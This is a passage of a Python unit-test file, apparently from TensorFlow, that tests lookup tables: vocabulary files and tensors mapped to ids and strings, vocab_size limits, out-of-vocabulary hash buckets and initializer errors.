        vocabulary_file=vocabulary_file,
        vocab_size=0)

  def test_index_table_from_file_tensor_fails_with_zero_size_vocabulary(self):
    """vocab_size=0 with a Tensor filename raises a descriptive ValueError."""
    vocabulary_file = constant_op.constant(
        self._createVocabFile("zero_vocab_tensor.txt"))
    self.assertRaisesRegexp(
        ValueError,
        "vocab_size must be greater than 0, got 0. "
        "vocabulary_file: .*zero_vocab_tensor.txt",
        lookup_ops.index_table_from_file,
        vocabulary_file=vocabulary_file,
        vocab_size=0)

  def test_index_table_from_file_with_vocab_size_too_small(self):
    """A smaller vocab_size truncates the vocabulary; extras map to -1."""
    vocabulary_file = self._createVocabFile("f2i_vocab6.txt")
    with self.test_session():
      table = lookup_ops.index_table_from_file(
          vocabulary_file=vocabulary_file, vocab_size=2)
      ids = table.lookup(constant_op.constant(["salad", "surgery", "tarkus"]))

      self.assertRaises(errors_impl.OpError, ids.eval)
      lookup_ops.tables_initializer().run()
      self.assertAllEqual((1, -1, -1), ids.eval())
      self.assertEqual(2, table.size().eval())

  def test_index_table_from_file_with_vocab_size_too_large(self):
    """A vocab_size larger than the file contents fails at init time."""
    vocabulary_file = self._createVocabFile("f2i_vocab7.txt")
    with self.test_session():
      table = lookup_ops.index_table_from_file(
          vocabulary_file=vocabulary_file, vocab_size=4)
      self.assertRaisesRegexp(errors_impl.InvalidArgumentError,
                              "Invalid vocab_size", table.init.run)

  def test_index_table_from_file_with_vocab_size(self):
    """An exact vocab_size loads the full vocabulary; OOV maps to -1."""
    vocabulary_file = self._createVocabFile("f2i_vocab8.txt")

    self.assertRaises(
        ValueError,
        lookup_ops.index_table_from_file,
        vocabulary_file=vocabulary_file,
        vocab_size=0)

    with self.test_session():
      table = lookup_ops.index_table_from_file(
          vocabulary_file=vocabulary_file, vocab_size=3)
      ids = table.lookup(constant_op.constant(["salad", "surgery", "tarkus"]))

      self.assertRaises(errors_impl.OpError, ids.eval)
      lookup_ops.tables_initializer().run()
      self.assertAllEqual((1, 2, -1), ids.eval())
      self.assertEqual(3, table.size().eval())

  def test_index_table_from_file_with_invalid_hashers(self):
    """Non-HasherSpec and unknown hasher specs are rejected."""
    vocabulary_file = self._createVocabFile("invalid_hasher.txt")
    with self.test_session():
      with self.assertRaises(TypeError):
        lookup_ops.index_table_from_file(
            vocabulary_file=vocabulary_file,
            vocab_size=3,
            num_oov_buckets=1,
            hasher_spec=1)

      table = lookup_ops.index_table_from_file(
          vocabulary_file=vocabulary_file,
          vocab_size=3,
          num_oov_buckets=1,
          hasher_spec=lookup_ops.HasherSpec("my-awesome-hash", None))

      self.assertRaises(ValueError, table.lookup,
                        constant_op.constant(["salad", "surgery", "tarkus"]))

  def test_index_table_from_file_table_ref_with_oov_buckets(self):
    """table_ref is exposed when OOV buckets are configured."""
    vocabulary_file = self._createVocabFile("f2i_vocab9.txt")
    with self.test_session():
      table = lookup_ops.index_table_from_file(
          vocabulary_file=vocabulary_file, num_oov_buckets=1)
      self.assertIsNotNone(table.table_ref)

  def test_index_table_from_file_table_ref_without_oov_buckets(self):
    """table_ref is exposed even with zero OOV buckets."""
    vocabulary_file = self._createVocabFile("f2i_vocab10.txt")
    with self.test_session():
      table = lookup_ops.index_table_from_file(
          vocabulary_file=vocabulary_file, num_oov_buckets=0)
      self.assertIsNotNone(table.table_ref)
class KeyValueTensorInitializerTest(test.TestCase):
  """Tests for `lookup_ops.KeyValueTensorInitializer` over key dtypes."""

  def test_string(self):
    """String keys with int64 values initialize successfully."""
    with ops.Graph().as_default(), self.test_session():
      initializer = lookup_ops.KeyValueTensorInitializer(
          ("brain", "salad", "surgery"), (0, 1, 2), dtypes.string,
          dtypes.int64)
      hash_table = lookup_ops.HashTable(initializer, default_value=-1)
      hash_table.init.run()

  def test_int64(self):
    """int64 keys with int64 values initialize successfully."""
    with ops.Graph().as_default(), self.test_session():
      initializer = lookup_ops.KeyValueTensorInitializer(
          (42, 1, -1000), (0, 1, 2), dtypes.int64, dtypes.int64)
      hash_table = lookup_ops.HashTable(initializer, default_value=-1)
      hash_table.init.run()

  def test_int32(self):
    """int32 keys have no registered kernel: init fails at run time."""
    with ops.Graph().as_default(), self.test_session():
      initializer = lookup_ops.KeyValueTensorInitializer(
          (42, 1, -1000), (0, 1, 2), dtypes.int32, dtypes.int64)
      hash_table = lookup_ops.HashTable(initializer, default_value=-1)
      with self.assertRaisesRegexp(
          errors_impl.OpError, "No OpKernel was registered"):
        hash_table.init.run()
class IndexTableFromTensor(test.TestCase):
  """Tests for ``lookup_ops.index_table_from_tensor`` (in-memory vocab)."""

  def test_index_table_from_tensor_with_tensor_init(self):
    """String vocab list maps to indices; OOV goes to the extra bucket."""
    with self.test_session():
      table = lookup_ops.index_table_from_tensor(
          vocabulary_list=("brain", "salad", "surgery"), num_oov_buckets=1)
      ids = table.lookup(constant_op.constant(("salad", "surgery", "tarkus")))

      # Lookup before initialization must fail.
      self.assertRaises(errors_impl.OpError, ids.eval)
      lookup_ops.tables_initializer().run()
      self.assertAllEqual((1, 2, 3), ids.eval())

  def test_int32_index_table_from_tensor_with_tensor_init(self):
    """int32 vocab list maps to indices; OOV goes to the extra bucket."""
    with self.test_session():
      table = lookup_ops.index_table_from_tensor(
          vocabulary_list=(42, 1, -1000), num_oov_buckets=1,
          dtype=dtypes.int32)
      ids = table.lookup(
          constant_op.constant((1, -1000, 11), dtype=dtypes.int32))

      self.assertRaises(errors_impl.OpError, ids.eval)
      lookup_ops.tables_initializer().run()
      self.assertAllEqual((1, 2, 3), ids.eval())

  def test_int64_index_table_from_tensor_with_tensor_init(self):
    """int64 vocab list maps to indices; OOV goes to the extra bucket."""
    with self.test_session():
      table = lookup_ops.index_table_from_tensor(
          vocabulary_list=(42, 1, -1000), num_oov_buckets=1,
          dtype=dtypes.int64)
      ids = table.lookup(
          constant_op.constant((1, -1000, 11), dtype=dtypes.int64))

      self.assertRaises(errors_impl.OpError, ids.eval)
      lookup_ops.tables_initializer().run()
      self.assertAllEqual((1, 2, 3), ids.eval())

  def test_index_table_from_tensor_with_default_value(self):
    """Without OOV buckets, missing keys get the supplied default value."""
    default_value = -42
    with self.test_session():
      table = lookup_ops.index_table_from_tensor(
          vocabulary_list=["brain", "salad", "surgery"],
          default_value=default_value)
      ids = table.lookup(constant_op.constant(["salad", "surgery", "tarkus"]))

      self.assertRaises(errors_impl.OpError, ids.eval)
      lookup_ops.tables_initializer().run()
      self.assertAllEqual((1, 2, default_value), ids.eval())

  def test_index_table_from_tensor_missing_vocabulary_list(self):
    """A None vocabulary_list raises ValueError at graph-build time."""
    with self.test_session():
      with self.assertRaisesRegexp(ValueError,
                                   "vocabulary_list must be specified"):
        lookup_ops.index_table_from_tensor(
            vocabulary_list=None, num_oov_buckets=1)

  def test_index_table_from_tensor_empty_vocabulary_list(self):
    """An empty vocabulary builds a graph but fails at initialization."""
    with self.test_session():
      table = lookup_ops.index_table_from_tensor(
          vocabulary_list=np.array([], dtype=np.str_), num_oov_buckets=1)
      ids = table.lookup(constant_op.constant(["salad", "surgery", "brain"]))

      self.assertRaises(errors_impl.OpError, ids.eval)

      with self.assertRaisesRegexp(
          errors_impl.OpError, "keys and values cannot be empty"):
        lookup_ops.tables_initializer().run()

  def test_index_table_from_tensor_with_invalid_hashers(self):
    """Non-HasherSpec and unknown hasher specs are rejected."""
    with self.test_session():
      with self.assertRaises(TypeError):
        lookup_ops.index_table_from_tensor(
            vocabulary_list=["brain", "salad", "surgery"],
            num_oov_buckets=1,
            hasher_spec=1)

      table = lookup_ops.index_table_from_tensor(
          vocabulary_list=["brain", "salad", "surgery"],
          num_oov_buckets=1,
          hasher_spec=lookup_ops.HasherSpec("my-awesome-hash", None))

      self.assertRaises(ValueError, table.lookup,
                        constant_op.constant(["salad", "surgery", "tarkus"]))
class IndexToStringTableFromFileTest(test.TestCase):
  """Tests for `lookup_ops.index_to_string_table_from_file` (id -> string)."""
  def _createVocabFile(self, basename, values=("brain", "salad", "surgery")):
    """Writes `values`, one per line, to a temp file; returns its path."""
    vocabulary_file = os.path.join(self.get_temp_dir(), basename)
    with open(vocabulary_file, "w") as f:
      f.write("\n".join(values) + "\n")
    return vocabulary_file
  def test_index_to_string_table(self):
    """Ids index into the vocab file; out-of-range ids yield "UNK"."""
    vocabulary_file = self._createVocabFile("i2f_vocab1.txt")
    with self.test_session():
      table = lookup_ops.index_to_string_table_from_file(
          vocabulary_file=vocabulary_file)
      features = table.lookup(constant_op.constant([0, 1, 2, 3], dtypes.int64))
      # Evaluating a lookup before the table is initialized must raise.
      self.assertRaises(errors_impl.OpError, features.eval)
      lookup_ops.tables_initializer().run()
      self.assertAllEqual((b"brain", b"salad", b"surgery", b"UNK"),
                          features.eval())
  def test_index_to_string_table_from_multicolumn_file(self):
    """Values come from column 0; keys are the line numbers."""
    vocabulary_file = self._createVocabFile(
        "f2i_vocab1.txt", values=("brain\t300", "salad\t20", "surgery\t1"))
    with self.test_session():
      table = lookup_ops.index_to_string_table_from_file(
          vocabulary_file=vocabulary_file,
          key_column_index=lookup_ops.TextFileIndex.LINE_NUMBER,
          value_column_index=0)
      features = table.lookup(constant_op.constant([0, 1, 2, 3], dtypes.int64))
      self.assertRaises(errors_impl.OpError, features.eval)
      lookup_ops.tables_initializer().run()
      self.assertAllEqual((b"brain", b"salad", b"surgery", b"UNK"),
                          features.eval())
  def test_index_to_string_table_from_multicolumn_file_custom_delimiter(self):
    """Same as above, but columns are split on a space delimiter."""
    vocabulary_file = self._createVocabFile(
        "f2i_vocab1.txt", values=("brain 300", "salad 20", "surgery 1"))
    with self.test_session():
      table = lookup_ops.index_to_string_table_from_file(
          vocabulary_file=vocabulary_file,
          key_column_index=lookup_ops.TextFileIndex.LINE_NUMBER,
          value_column_index=0,
          delimiter=" ")
      features = table.lookup(constant_op.constant([0, 1, 2, 3], dtypes.int64))
      self.assertRaises(errors_impl.OpError, features.eval)
      lookup_ops.tables_initializer().run()
      self.assertAllEqual((b"brain", b"salad", b"surgery", b"UNK"),
                          features.eval())
  def test_index_to_string_table_with_default_value(self):
    """Out-of-range ids map to a caller-supplied default value."""
    default_value = b"NONE"
    vocabulary_file = self._createVocabFile("f2i_vocab2.txt")
    with self.test_session():
      table = lookup_ops.index_to_string_table_from_file(
          vocabulary_file=vocabulary_file, default_value=default_value)
      features = table.lookup(constant_op.constant([1, 2, 4], dtypes.int64))
      self.assertRaises(errors_impl.OpError, features.eval)
      lookup_ops.tables_initializer().run()
      self.assertAllEqual((b"salad", b"surgery", default_value),
                          features.eval())
  def test_index_to_string_table_with_vocab_size_too_small(self):
    """vocab_size truncates the file: ids >= vocab_size get the default."""
    default_value = b"NONE"
    vocabulary_file = self._createVocabFile("f2i_vocab2.txt")
    with self.test_session():
      table = lookup_ops.index_to_string_table_from_file(
          vocabulary_file=vocabulary_file,
          vocab_size=2,
          default_value=default_value)
      features = table.lookup(constant_op.constant([1, 2, 4], dtypes.int64))
      self.assertRaises(errors_impl.OpError, features.eval)
      lookup_ops.tables_initializer().run()
      self.assertAllEqual((b"salad", default_value, default_value),
                          features.eval())
  def test_index_to_string_table_with_vocab_size_too_large(self):
    """A vocab_size larger than the file's line count fails at init."""
    vocabulary_file = self._createVocabFile("f2i_vocab6.txt")
    with self.test_session():
      table = lookup_ops.index_to_string_table_from_file(
          vocabulary_file=vocabulary_file, vocab_size=4)
      features = table.lookup(constant_op.constant([1, 2, 4], dtypes.int64))
      self.assertRaises(errors_impl.OpError, features.eval)
      init = lookup_ops.tables_initializer()
      self.assertRaisesRegexp(errors_impl.InvalidArgumentError,
                              "Invalid vocab_size", init.run)
  def test_index_to_string_table_with_vocab_size(self):
    """A vocab_size equal to the file's line count initializes cleanly."""
    vocabulary_file = self._createVocabFile("f2i_vocab7.txt")
    with self.test_session():
      table = lookup_ops.index_to_string_table_from_file(
          vocabulary_file=vocabulary_file, vocab_size=3)
      features = table.lookup(constant_op.constant([1, 2, 4], dtypes.int64))
      self.assertRaises(errors_impl.OpError, features.eval)
      lookup_ops.tables_initializer().run()
      self.assertAllEqual((b"salad", b"surgery", b"UNK"), features.eval())
class IndexToStringTableFromTensorTest(test.TestCase):
  """Tests for `lookup_ops.index_to_string_table_from_tensor`."""
  def test_index_to_string_table_from_tensor(self):
    """Ids index into the vocab tensor; out-of-range ids yield "UNK"."""
    with self.test_session():
      vocabulary_list = constant_op.constant(["brain", "salad", "surgery"])
      table = lookup_ops.index_to_string_table_from_tensor(
          vocabulary_list=vocabulary_list)
      indices = constant_op.constant([0, 1, 2, 3], dtypes.int64)
      features = table.lookup(indices)
      # Evaluating a lookup before the table is initialized must raise.
      self.assertRaises(errors_impl.OpError, features.eval)
      lookup_ops.tables_initializer().run()
      self.assertAllEqual((b"brain", b"salad", b"surgery", b"UNK"),
                          features.eval())
  def test_duplicate_entries(self):
    """Duplicate vocab entries are allowed for id -> string tables."""
    with self.test_session():
      vocabulary_list = constant_op.constant(["hello", "hello"])
      table = lookup_ops.index_to_string_table_from_tensor(
          vocabulary_list=vocabulary_list)
      indices = constant_op.constant([0, 1, 4], dtypes.int64)
      features = table.lookup(indices)
      lookup_ops.tables_initializer().run()
      self.assertAllEqual((b"hello", b"hello", b"UNK"), features.eval())
  def test_index_to_string_with_default_value(self):
    """Out-of-range ids map to a caller-supplied default value."""
    default_value = b"NONE"
    with self.test_session():
      vocabulary_list = constant_op.constant(["brain", "salad", "surgery"])
      table = lookup_ops.index_to_string_table_from_tensor(
          vocabulary_list=vocabulary_list, default_value=default_value)
      indices = constant_op.constant([1, 2, 4], dtypes.int64)
      features = table.lookup(indices)
      self.assertRaises(errors_impl.OpError, features.eval)
      lookup_ops.tables_initializer().run()
      self.assertAllEqual((b"salad", b"surgery", default_value),
                          features.eval())
class InitializeTableFromFileOpTest(test.TestCase):
  """Tests for HashTable initialized via the TextFile*Initializer variants."""
  def _createVocabFile(self, basename, values=("brain", "salad", "surgery")):
    """Writes `values`, one per line, to a temp file; returns its path."""
    vocabulary_file = os.path.join(self.get_temp_dir(), basename)
    with open(vocabulary_file, "w") as f:
      f.write("\n".join(values) + "\n")
    return vocabulary_file
  def testInitializeStringTable(self):
    """string keys (whole line) -> int64 line numbers; misses -> -1."""
    vocabulary_file = self._createVocabFile("one_column_1.txt")
    with self.test_session():
      default_value = -1
      table = lookup_ops.HashTable(
          lookup_ops.TextFileInitializer(
              vocabulary_file, dtypes.string,
              lookup_ops.TextFileIndex.WHOLE_LINE, dtypes.int64,
              lookup_ops.TextFileIndex.LINE_NUMBER), default_value)
      table.init.run()
      output = table.lookup(constant_op.constant(["brain", "salad", "tank"]))
      result = output.eval()
      self.assertAllEqual([0, 1, -1], result)
  def testInitializeInt64Table(self):
    """int64 keys parsed from whole lines -> int64 line numbers."""
    vocabulary_file = self._createVocabFile(
        "one_column_int64.txt", values=("42", "1", "-1000"))
    with self.test_session():
      default_value = -1
      table = lookup_ops.HashTable(
          lookup_ops.TextFileInitializer(
              vocabulary_file, dtypes.int64,
              lookup_ops.TextFileIndex.WHOLE_LINE, dtypes.int64,
              lookup_ops.TextFileIndex.LINE_NUMBER), default_value)
      table.init.run()
      output = table.lookup(
          constant_op.constant((42, 1, 11), dtype=dtypes.int64))
      result = output.eval()
      self.assertAllEqual([0, 1, -1], result)
  def testInitializeIndexTable(self):
    """Reversed mapping: line numbers -> whole-line string values."""
    vocabulary_file = self._createVocabFile("one_column_2.txt")
    with self.test_session():
      default_value = "UNK"
      key_index = lookup_ops.TextFileIndex.LINE_NUMBER
      value_index = lookup_ops.TextFileIndex.WHOLE_LINE
      table = lookup_ops.HashTable(
          lookup_ops.TextFileInitializer(vocabulary_file, dtypes.int64,
                                         key_index, dtypes.string, value_index),
          default_value)
      table.init.run()
      input_values = constant_op.constant([0, 1, 2, 3], dtypes.int64)
      output = table.lookup(input_values)
      result = output.eval()
      self.assertAllEqual([b"brain", b"salad", b"surgery", b"UNK"], result)
  def testMultiColumn(self):
    """Keys and values can come from arbitrary tab-separated columns."""
    vocabulary_file = os.path.join(self.get_temp_dir(), "three_columns.txt")
    with open(vocabulary_file, "w") as f:
      f.write("\n".join(["0\tbrain\t1", "1\tsalad\t5", "2\tsurgery\t6"]) + "\n")
    with self.test_session():
      default_value = -1
      key_index = 1
      value_index = 2
      table = lookup_ops.HashTable(
          lookup_ops.TextFileInitializer(vocabulary_file, dtypes.string,
                                         key_index, dtypes.int64, value_index),
          default_value)
      table.init.run()
      input_string = constant_op.constant(["brain", "salad", "surgery"])
      output = table.lookup(input_string)
      result = output.eval()
      self.assertAllEqual([1, 5, 6], result)
  def testInvalidDataTypeInMultiColumn(self):
    """A non-numeric column declared as int64 fails at init time."""
    vocabulary_file = os.path.join(self.get_temp_dir(), "three_columns.txt")
    with open(vocabulary_file, "w") as f:
      f.write("\n".join(["0\tbrain\t1", "1\tsalad\t5", "2\tsurgery\t6"]) + "\n")
    with self.test_session():
      default_value = -1
      key_index = 2
      value_index = 1
      table = lookup_ops.HashTable(
          lookup_ops.TextFileInitializer(vocabulary_file, dtypes.string,
                                         key_index, dtypes.int64, value_index),
          default_value)
      with self.assertRaisesOpError("is not a valid"):
        table.init.run()
  def testInvalidDataType(self):
    """WHOLE_LINE keys must be string-typed; int64 is rejected eagerly."""
    vocabulary_file = self._createVocabFile("one_column_3.txt")
    with self.test_session():
      default_value = "UNK"
      key_index = lookup_ops.TextFileIndex.WHOLE_LINE
      value_index = lookup_ops.TextFileIndex.LINE_NUMBER
      with self.assertRaises(ValueError):
        lookup_ops.HashTable(
            lookup_ops.TextFileInitializer(vocabulary_file, dtypes.int64,
                                           key_index, dtypes.string,
                                           value_index), default_value)
  def testInvalidIndex(self):
    """A column index beyond the file's column count fails at init."""
    vocabulary_file = self._createVocabFile("one_column_4.txt")
    with self.test_session():
      default_value = -1
      key_index = 1  # second column of the line
      value_index = lookup_ops.TextFileIndex.LINE_NUMBER
      table = lookup_ops.HashTable(
          lookup_ops.TextFileInitializer(vocabulary_file, dtypes.string,
                                         key_index, dtypes.int64, value_index),
          default_value)
      with self.assertRaisesOpError("Invalid number of columns"):
        table.init.run()
  def testInitializeSameTableWithMultipleNodes(self):
    """Tables created with the same shared_name share one resource."""
    vocabulary_file = self._createVocabFile("one_column_5.txt")
    with self.test_session() as sess:
      shared_name = "shared-one-columm"
      default_value = -1
      table1 = lookup_ops.HashTable(
          lookup_ops.TextFileInitializer(vocabulary_file, dtypes.string,
                                         lookup_ops.TextFileIndex.WHOLE_LINE,
                                         dtypes.int64,
                                         lookup_ops.TextFileIndex.LINE_NUMBER),
          default_value,
          shared_name=shared_name)
      table2 = lookup_ops.HashTable(
          lookup_ops.TextFileInitializer(vocabulary_file, dtypes.string,
                                         lookup_ops.TextFileIndex.WHOLE_LINE,
                                         dtypes.int64,
                                         lookup_ops.TextFileIndex.LINE_NUMBER),
          default_value,
          shared_name=shared_name)
      table3 = lookup_ops.HashTable(
          lookup_ops.TextFileInitializer(vocabulary_file, dtypes.string,
                                         lookup_ops.TextFileIndex.WHOLE_LINE,
                                         dtypes.int64,
                                         lookup_ops.TextFileIndex.LINE_NUMBER),
          default_value,
          shared_name=shared_name)
      lookup_ops.tables_initializer().run()
      input_string = constant_op.constant(["brain", "salad", "tank"])
      output1 = table1.lookup(input_string)
      output2 = table2.lookup(input_string)
      output3 = table3.lookup(input_string)
      out1, out2, out3 = sess.run([output1, output2, output3])
      # All three handles see the same initialized data.
      self.assertAllEqual([0, 1, -1], out1)
      self.assertAllEqual([0, 1, -1], out2)
      self.assertAllEqual([0, 1, -1], out3)
  def testInitializeTableWithNoFilename(self):
    """An empty filename is rejected at graph-construction time."""
    with self.test_session():
      default_value = -1
      with self.assertRaises(ValueError):
        lookup_ops.HashTable(
            lookup_ops.TextFileInitializer(
                "", dtypes.string, lookup_ops.TextFileIndex.WHOLE_LINE,
                dtypes.int64, lookup_ops.TextFileIndex.LINE_NUMBER),
            default_value)
  def testInitializeWithVocabSize(self):
    """vocab_size: exact size works, too large fails, smaller truncates."""
    with self.test_session():
      default_value = -1
      vocab_size = 3
      vocabulary_file1 = self._createVocabFile("one_column6.txt")
      table1 = lookup_ops.HashTable(
          lookup_ops.TextFileInitializer(
              vocabulary_file1,
              dtypes.string,
              lookup_ops.TextFileIndex.WHOLE_LINE,
              dtypes.int64,
              lookup_ops.TextFileIndex.LINE_NUMBER,
              vocab_size=vocab_size), default_value)
      # Initialize from file.
      table1.init.run()
      self.assertEquals(vocab_size, table1.size().eval())
      vocabulary_file2 = self._createVocabFile("one_column7.txt")
      vocab_size = 5
      table2 = lookup_ops.HashTable(
          lookup_ops.TextFileInitializer(
              vocabulary_file2,
              dtypes.string,
              lookup_ops.TextFileIndex.WHOLE_LINE,
              dtypes.int64,
              lookup_ops.TextFileIndex.LINE_NUMBER,
              vocab_size=vocab_size), default_value)
      with self.assertRaisesOpError("Invalid vocab_size"):
        table2.init.run()
      vocab_size = 1
      vocabulary_file3 = self._createVocabFile("one_column3.txt")
      table3 = lookup_ops.HashTable(
          lookup_ops.TextFileInitializer(
              vocabulary_file3,
              dtypes.string,
              lookup_ops.TextFileIndex.WHOLE_LINE,
              dtypes.int64,
              lookup_ops.TextFileIndex.LINE_NUMBER,
              vocab_size=vocab_size), default_value)
      # Smaller vocab size reads only vocab_size records.
      table3.init.run()
      self.assertEquals(vocab_size, table3.size().eval())
  def testFeedVocabularyName(self):
    """The vocab filename can be fed via the ASSET_FILEPATHS collection."""
    vocabulary_file = self._createVocabFile("feed_vocabulary.txt")
    with self.test_session():
      default_value = -1
      table = lookup_ops.HashTable(
          lookup_ops.TextFileInitializer(
              "old_file.txt", dtypes.string,
              lookup_ops.TextFileIndex.WHOLE_LINE, dtypes.int64,
              lookup_ops.TextFileIndex.LINE_NUMBER), default_value)
      # Initialize with non existing file (old_file.txt) should fail.
      # TODO(yleon): Update message, which might change per FileSystem.
      with self.assertRaisesOpError("old_file.txt"):
        table.init.run()
      # Initialize the model feeding the vocabulary file.
      filenames = ops.get_collection(ops.GraphKeys.ASSET_FILEPATHS)
      table.init.run(feed_dict={filenames[0]: vocabulary_file})
      input_string = constant_op.constant(["brain", "salad", "tank"])
      output = table.lookup(input_string)
      result = output.eval()
      self.assertAllEqual([0, 1, -1], result)
  def testInvalidFilenames(self):
    """The filename must be a scalar string tensor (or Python string)."""
    vocabulary_file = self._createVocabFile("filename_shape.txt")
    with self.test_session():
      default_value = -1
      # Invalid data type
      other_type = constant_op.constant(1)
      with self.assertRaises(ValueError):
        lookup_ops.HashTable(
            lookup_ops.TextFileInitializer(
                other_type, dtypes.string, lookup_ops.TextFileIndex.WHOLE_LINE,
                dtypes.int64, lookup_ops.TextFileIndex.LINE_NUMBER),
            default_value)
      # Non-scalar filename
      filenames = constant_op.constant([vocabulary_file, vocabulary_file])
      with self.assertRaises(ValueError):
        lookup_ops.HashTable(
            lookup_ops.TextFileInitializer(
                filenames, dtypes.string, lookup_ops.TextFileIndex.WHOLE_LINE,
                dtypes.int64, lookup_ops.TextFileIndex.LINE_NUMBER),
            default_value)
  def testIdToStringTable(self):
    """TextFileStringTableInitializer: id -> string with vocab_size."""
    vocab_file = self._createVocabFile("feat_to_id_1.txt")
    with self.test_session():
      default_value = "UNK"
      vocab_size = 3
      table = lookup_ops.HashTable(
          lookup_ops.TextFileStringTableInitializer(
              vocab_file, vocab_size=vocab_size), default_value)
      table.init.run()
      input_values = constant_op.constant([0, 1, 2, 3], dtypes.int64)
      out = table.lookup(input_values)
      self.assertAllEqual([b"brain", b"salad", b"surgery", b"UNK"], out.eval())
      self.assertEquals(vocab_size, table.size().eval())
  def testStringToIdTable(self):
    """TextFileIdTableInitializer: string -> id with vocab_size."""
    vocab_file = self._createVocabFile("feat_to_id_2.txt")
    with self.test_session():
      default_value = -1
      vocab_size = 3
      table = lookup_ops.HashTable(
          lookup_ops.TextFileIdTableInitializer(
              vocab_file, vocab_size=vocab_size), default_value)
      table.init.run()
      input_string = constant_op.constant(["brain", "salad", "surgery", "UNK"])
      out = table.lookup(input_string)
      self.assertAllEqual([0, 1, 2, -1], out.eval())
      self.assertEquals(vocab_size, table.size().eval())
  def testInt64ToIdTable(self):
    """TextFileIdTableInitializer with int64 keys parsed from the file."""
    vocab_file = self._createVocabFile(
        "feat_to_id_3.txt", values=("42", "1", "-1000"))
    with self.test_session():
      default_value = -1
      vocab_size = 3
      table = lookup_ops.HashTable(
          lookup_ops.TextFileIdTableInitializer(
              vocab_file, vocab_size=vocab_size, key_dtype=dtypes.int64),
          default_value)
      table.init.run()
      out = table.lookup(
          constant_op.constant((42, 1, -1000, 11), dtype=dtypes.int64))
      self.assertAllEqual((0, 1, 2, -1), out.eval())
      self.assertEquals(vocab_size, table.size().eval())
class IdTableWithHashBucketsTest(test.TestCase):
  """Tests for IdTableWithHashBuckets (vocab table plus OOV hash buckets)."""
  def _createVocabFile(self, basename, values=("brain", "salad", "surgery")):
    """Writes `values`, one per line, to a temp file; returns its path."""
    vocabulary_file = os.path.join(self.get_temp_dir(), basename)
    with open(vocabulary_file, "w") as f:
      f.write("\n".join(values) + "\n")
    return vocabulary_file
  def testStringIdTableWithHashBuckets(self):
    """In-vocab strings keep their ids; OOV strings land in a bucket."""
    vocab_file = self._createVocabFile("feat_to_id_1.txt")
    with self.test_session():
      default_value = -1
      vocab_size = 3
      oov_buckets = 1
      table = lookup_ops.IdTableWithHashBuckets(
          lookup_ops.HashTable(
              lookup_ops.TextFileIdTableInitializer(
                  vocab_file, vocab_size=vocab_size), default_value),
          oov_buckets)
      table.init.run()
      input_string = constant_op.constant(["brain", "salad", "surgery", "UNK"])
      out = table.lookup(input_string)
      self.assertAllEqual([0, 1, 2, 3], out.eval())
      self.assertEquals(vocab_size + oov_buckets, table.size().eval())
  def testInt32IdTableWithHashBuckets(self):
    """int32 inputs are supported over an int64-keyed inner table."""
    vocab_file = self._createVocabFile("feat_to_id_2.txt", ("42", "1", "-1000"))
    with self.test_session():
      default_value = -1
      vocab_size = 3
      oov_buckets = 1
      table = lookup_ops.IdTableWithHashBuckets(
          lookup_ops.HashTable(
              lookup_ops.TextFileIdTableInitializer(
                  vocab_file, vocab_size=vocab_size, key_dtype=dtypes.int64),
              default_value),
          oov_buckets,
          key_dtype=dtypes.int32)
      table.init.run()
      values = constant_op.constant((42, 1, -1000, 11), dtype=dtypes.int32)
      out = table.lookup(values)
      self.assertAllEqual([0, 1, 2, 3], out.eval())
      self.assertEquals(vocab_size + oov_buckets, table.size().eval())
  def testInt64IdTableWithHashBuckets(self):
    """int64 inputs with an int64-keyed inner table."""
    vocab_file = self._createVocabFile("feat_to_id_3.txt", ("42", "1", "-1000"))
    with self.test_session():
      default_value = -1
      vocab_size = 3
      oov_buckets = 1
      table = lookup_ops.IdTableWithHashBuckets(
          lookup_ops.HashTable(
              lookup_ops.TextFileIdTableInitializer(
                  vocab_file, vocab_size=vocab_size, key_dtype=dtypes.int64),
              default_value), oov_buckets)
      table.init.run()
      values = constant_op.constant((42, 1, -1000, 11), dtype=dtypes.int64)
      out = table.lookup(values)
      self.assertAllEqual([0, 1, 2, 3], out.eval())
      self.assertEquals(vocab_size + oov_buckets, table.size().eval())
  def testStringIdTableWithOnlyHashBucket(self):
    """With no inner table, every id comes from fingerprint mod buckets."""
    with self.test_session():
      oov_buckets = 5
      # Set a table that only uses hash buckets, for each input value returns
      # an id calculated by fingerprint("input") mod oov_buckets.
      table = lookup_ops.IdTableWithHashBuckets(None, oov_buckets)
      table.init.run()
      values = constant_op.constant(("brain", "salad", "surgery"))
      out = table.lookup(values)
      self.assertAllEqual(
          [
              3,  # fingerprint("brain") mod 5.
              1,  # fingerprint("salad") mod 5.
              4  # fingerprint("surgery") mod 5
          ],
          out.eval())
      self.assertEquals(oov_buckets, table.size().eval())
  def testInt32IdTableWithOnlyHashBucket(self):
    """Hash-bucket-only table with int32 keys."""
    with self.test_session():
      oov_buckets = 5
      # Set a table that only uses hash buckets, for each input value returns
      # an id calculated by fingerprint("input") mod oov_buckets.
      table = lookup_ops.IdTableWithHashBuckets(
          None, oov_buckets, key_dtype=dtypes.int32)
      table.init.run()
      input_string = constant_op.constant([42, 1, -1000], dtype=dtypes.int32)
      out = table.lookup(input_string)
      self.assertAllEqual(
          [
              1,  # fingerprint("42") mod 5.
              4,  # fingerprint("1") mod 5.
              2  # fingerprint("-1000") mod 5
          ],
          out.eval())
      self.assertEquals(oov_buckets, table.size().eval())
  def testFloat64IdTableWithOnlyHashBucket(self):
    """float64 keys cannot be hashed into buckets; rejected eagerly."""
    with self.test_session():
      with self.assertRaisesRegexp(TypeError, "Invalid key_dtype"):
        lookup_ops.IdTableWithHashBuckets(
            None, num_oov_buckets=5, key_dtype=dtypes.float64)
  def testBoolIdTableWithOnlyHashBucket(self):
    """bool keys cannot be hashed into buckets; rejected eagerly."""
    with self.test_session():
      with self.assertRaisesRegexp(TypeError, "Invalid key_dtype"):
        lookup_ops.IdTableWithHashBuckets(
            None, num_oov_buckets=5, key_dtype=dtypes.bool)
  def testIdTableWithHashBucketsWithMultipleInitializers(self):
    """Fast and strong hashers can wrap the same vocab table."""
    vocab_file = self._createVocabFile("feat_to_id_4.txt")
    with self.test_session() as sess:
      default_value = -1
      vocab_size = 3
      oov_buckets = 3
      vocab_table = lookup_ops.HashTable(
          lookup_ops.TextFileIdTableInitializer(
              vocab_file, vocab_size=vocab_size), default_value)
      table1 = lookup_ops.IdTableWithHashBuckets(
          vocab_table,
          oov_buckets,
          hasher_spec=lookup_ops.FastHashSpec,
          name="table1")
      table2 = lookup_ops.IdTableWithHashBuckets(
          vocab_table,
          oov_buckets,
          hasher_spec=lookup_ops.StrongHashSpec((1, 2)),
          name="table2")
      lookup_ops.tables_initializer().run()
